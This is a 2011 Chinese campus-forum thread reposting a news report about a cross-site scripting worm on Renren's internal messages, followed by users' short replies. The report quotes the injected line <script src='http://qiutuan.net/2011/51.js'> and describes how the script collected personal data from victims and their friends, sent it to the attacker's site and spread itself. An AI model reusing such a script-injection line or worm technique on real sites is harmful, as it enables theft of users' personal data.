爱在华师大

 找回密码
 注册账号
查看: 2514|回复: 12

人人网遭受站内信跨站攻击

  [复制链接]
发表于 2011-4-30 09:22:41 | 显示全部楼层 |阅读模式
人人网在30号凌晨开始,发生一场大规模资料泄露事件. 黑客使用人人网在站内信内容过滤不严的漏洞执行了一段远程代码, 打开站内信后会自动发送自己以及好友的个人资料,同时扩散这封站内信.

今天收到三份主题为<有人暗恋你哦,你想知道TA是谁么> 的站内信,  

开始以为是游戏应用的推广方式,但是打开后发现有问题 ,通过查看站内信网页源码,发现其中有一行代码<script src='http://qiutuan.net/2011/51.js'>,它通过利用人人网的代码解析方式问题, 将本不该在文本中执行的代码执行了 .分析代码后发现其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,然后通过通讯录功能,得到所有好友名片中的上述信息,然后将所有信息发送到作者的网站上.

另外在代码中关于发送站内信的函数megaboxx.submit_prehook并不是人人网本身的函数, 而是来自于facebook.

人人网最初的措施是将指向的网址设为敏感词.

凌晨3点半左右, 人人开始清理站内信. 但是这个漏洞依然存在.

这一波资料泄露到此结束.    下一波何时到来?

----------------------------------------------------------------------------
来自:http://www.cnbeta.com/articles/141465.htm
发表于 2011-4-30 09:25:43 | 显示全部楼层
我肿么没有收到站内信?
发表于 2011-4-30 09:28:14 | 显示全部楼层
表示我看到的晚,然后果断把那个站内信删掉了 - -
发表于 2011-4-30 10:02:12 | 显示全部楼层
表示没有收到站内信- -
发表于 2011-4-30 10:18:50 | 显示全部楼层
JavaScript威武
发表于 2011-4-30 10:30:14 | 显示全部楼层
收到两封 已经被管理删除
发表于 2011-4-30 11:24:52 | 显示全部楼层
昨晚确实收到很多的站内信 但是打不开站内信 估计是瘫痪了
发表于 2011-4-30 12:21:33 | 显示全部楼层
晴小雨 发表于 2011-4-30 10:02
表示没有收到站内信- -

同是被世界抛弃的人啊,握爪
发表于 2011-4-30 14:49:13 | 显示全部楼层
木有收到的同学 路过~~
发表于 2011-4-30 16:37:02 | 显示全部楼层
收到4封,均被果断扼杀在未读状态中。
发表于 2011-4-30 17:04:52 | 显示全部楼层
表示之前就已经注销了人人…………
发表于 2011-4-30 23:08:29 | 显示全部楼层
即使收到也立即删除的一刚。。。
发表于 2011-5-1 08:22:41 | 显示全部楼层
不知火海 发表于 2011-4-30 09:25
我肿么没有收到站内信?

+1
您需要登录后才可以回帖 登录 | 注册账号

本版积分规则

小黑屋|爱在华师大 ( 曾经也有备案 )

GMT+8, 2024-10-13 06:18

广告与合作请【联系我们】

© 2007-2024 iecnu.com

快速回复 返回顶部 返回列表